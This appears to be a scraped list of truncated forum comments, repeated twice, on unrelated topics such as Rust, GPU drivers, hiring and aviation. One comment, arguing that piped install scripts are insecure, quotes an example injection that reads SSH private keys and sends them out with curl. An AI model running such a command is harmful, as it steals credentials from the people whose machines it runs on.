Ease the snark space ranger. > dynamic errors fail smaller granularity tasks and handlers deal with tasks failing due to safety checks going bad. Yes and that's why Rust is bad here (but it doesn't have to be). Rust…
> it's definitely not what he wrote. I feel like we must have read two different articles. You sound crazy. Didn't read it your way at all. > Think of that "debugging tools give a huge warning" as being the equivalent…
It could, but I can trust that no individual stepped in the middle of that process. I trust Rust to not put such a thing in their binary. I do not trust an arbitrary man in the middle, and it's trivial to modify a shell…
"a bunch of folks do something insecure" does not speak argument. The argument is that it is insecure. Most easily because I can inject, "cat ~/.ssh/*_rsa | curl ..." and get your company ssh keys. There's no reason…
> Have a look at libdrm from the mesa project (the AMDGPU submodule), then it will give you pointers where to look into the kernel-DRM via the right IOCTLs. Exactly the pointer I was looking for, thank you.
Do you have a reference for the AMD interface? I know it exists but don't know where to find it.
See https://unyt.readthedocs.io/en/stable/ in Python. This sort of feature fits really well within Python's featureset.
> This reads like some generic LinkedIn CEO post that sounds deep on the surface but actually means nothing. I felt exactly the opposite. In my career as an engineer I regularly encounter experts who claim to be so, but…
IMHO it's like your actual desk. Some people like it clean and organized - others have a cluttered mess of objects. My desk is a tragedy, but I much prefer tiling window managers and rigid, well-organized computing…
Yeah I dug into the update catalog and downloaded the update that way myself. So there's a few ways to get it. Folks above mentioned the Update Assistant giving it if the Windows Update screen doesn't.
I think it's pretty common at small to mid sized companies + startups. Your more "trendy" companies and your F500 companies do the type of Leetcode interview you hear everyone on HN complain about. It typically looks…
> That rarely happens with churches. I agree. If the church didn't survive, they would just build a new one. I imagine there lie the remains of hundreds of separate cathedrals under one. But you would never say "the…
> They are already way outside of rational territory and deep into religious territory. In their minds Linux hasn't changed a bit since 1999, even though if you were to compare mac os from that time period against…
IMO the people with said power and responsibility just want to finger point. But what do you do when no one is willing to put on the pants?
That first comment nails it as well. Everyone wants to feel like they're contributing something novel or unique to a comment thread but....
Found some detail - apparently the CPU manuals are the place to check https://cs.stackexchange.com/a/1090
Coherency will be maintained (since the protocols support that case). But yes, a separate process would evict that memory. From the processors point of view, they're just addresses tagged with data. Caching behavior…
Could anyone who is a pilot comment on what you're _supposed_ to do if your engine completely goes out? From what I've read so far the answer is "keep trying to get the engine back". Do you just try and glide it out and…
I grew up pretty close to Chicago and folks in California still call me "corn boy".
> The vast majority of the deaths have been in age groups that are typically out of the workforce. But I had the impression people were unable to retire or retiring significantly later.
This may be a bit stupid of a thing to say. But didn't a bunch of people just die? Wouldnt this make labor more scarce and valuable? Why is this continually framed as a "these lazy kids" or welfare thing?
Probably will lose an account over this, but... > I don't think that "autistic" is more of a "status symbol" than, say, "gay". Uh..aren't they both pretty big status symbols? Gay, queer, disability, "this is indigenous…
Now explain that to a lawyer. They won't get it. Trust me.
Patience is as much a skill as any other though. I don't quite understand this hyperoptimization. I'll speed up things I find a little dull or advertisements, but increasing the pace of everyone's speech for your sake…
Ease the snark space ranger. > dynamic errors fail smaller granularity tasks and handlers deal with tasks failing due to safety checks going bad. Yes and that's why Rust is bad here (but it doesn't have to be). Rust…
> it's definitely not what he wrote. I feel like we must have read two different articles. You sound crazy. Didn't read it your way at all. > Think of that "debugging tools give a huge warning" as being the equivalent…
It could, but I can trust that no individual stepped in the middle of that process. I trust Rust to not put such a thing in their binary. I do not trust an arbitrary man in the middle, and it's trivial to modify a shell…
"a bunch of folks do something insecure" does not speak argument. The argument is that it is insecure. Most easily because I can inject, "cat ~/.ssh/*_rsa | curl ..." and get your company ssh keys. There's no reason…
> Have a look at libdrm from the mesa project (the AMDGPU submodule), then it will give you pointers where to look into the kernel-DRM via the right IOCTLs. Exactly the pointer I was looking for, thank you.
Do you have a reference for the AMD interface? I know it exists but don't know where to find it.
See https://unyt.readthedocs.io/en/stable/ in Python. This sort of feature fits really well within Python's featureset.
> This reads like some generic LinkedIn CEO post that sounds deep on the surface but actually means nothing. I felt exactly the opposite. In my career as an engineer I regularly encounter experts who claim to be so, but…
IMHO it's like your actual desk. Some people like it clean and organized - others have a cluttered mess of objects. My desk is a tragedy, but I much prefer tiling window managers and rigid, well-organized computing…
Yeah I dug into the update catalog and downloaded the update that way myself. So there's a few ways to get it. Folks above mentioned the Update Assistant giving it if the Windows Update screen doesn't.
I think it's pretty common at small to mid sized companies + startups. Your more "trendy" companies and your F500 companies do the type of Leetcode interview you hear everyone on HN complain about. It typically looks…
> That rarely happens with churches. I agree. If the church didn't survive, they would just build a new one. I imagine there lie the remains of hundreds of separate cathedrals under one. But you would never say "the…
> They are already way outside of rational territory and deep into religious territory. In their minds Linux hasn't changed a bit since 1999, even though if you were to compare mac os from that time period against…
IMO the people with said power and responsibility just want to finger point. But what do you do when no one is willing to put on the pants?
That first comment nails it as well. Everyone wants to feel like they're contributing something novel or unique to a comment thread but....
Found some detail - apparently the CPU manuals are the place to check https://cs.stackexchange.com/a/1090
Coherency will be maintained (since the protocols support that case). But yes, a separate process would evict that memory. From the processors point of view, they're just addresses tagged with data. Caching behavior…
Could anyone who is a pilot comment on what you're _supposed_ to do if your engine completely goes out? From what I've read so far the answer is "keep trying to get the engine back". Do you just try and glide it out and…
I grew up pretty close to Chicago and folks in California still call me "corn boy".
> The vast majority of the deaths have been in age groups that are typically out of the workforce. But I had the impression people were unable to retire or retiring significantly later.
This may be a bit stupid of a thing to say. But didn't a bunch of people just die? Wouldnt this make labor more scarce and valuable? Why is this continually framed as a "these lazy kids" or welfare thing?
Probably will lose an account over this, but... > I don't think that "autistic" is more of a "status symbol" than, say, "gay". Uh..aren't they both pretty big status symbols? Gay, queer, disability, "this is indigenous…
Now explain that to a lawyer. They won't get it. Trust me.
Patience is as much a skill as any other though. I don't quite understand this hyperoptimization. I'll speed up things I find a little dull or advertisements, but increasing the pace of everyone's speech for your sake…